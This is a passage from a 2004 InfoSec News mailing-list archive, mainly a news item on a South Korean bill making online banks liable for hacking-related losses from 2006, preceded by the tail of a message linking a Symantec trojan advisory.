is available here [1]. [1] http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html#threatassessment From isn at c4i.org Fri Dec 31 05:30:34 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:30 2004 Subject: [ISN] Online Banks Will Be Liable for 'Hacking' Damages in 2006 Message-ID: http://english.chosun.com/w21data/html/news/200412/200412300030.html Park Jong-se Dec. 30, 2004 Starting from 2006, financial institutions will be held responsible for any damage consumers may suffer at the hands of hackers or from malfunctioning computer systems while engaging in financial transactions on the Internet. The government adopted a financial e-transaction bill during a vice ministerial meeting Thursday. The bill will be discussed at a Cabinet meeting scheduled for Jan. 4 before being submitted to the National Assembly. According to the bill, if consumers incur damages or loss while engaging in e-banking because of an incident caused by a third factor, such as a case of hacking or computer system meltdowns, financial institutions or e-banking service providers will be liable. An exception that grants financial institutions immunity is also included in the bill. If consumers cause a problem deliberately or by their own mistakes, they will be held accountable. The bill states that consumers' identification number, secret code and certified document, all of which are essential prerequisites for e-banking, should be issued only when consumers apply for them and after their identity has been confirmed. It also mandates that transaction records should be kept.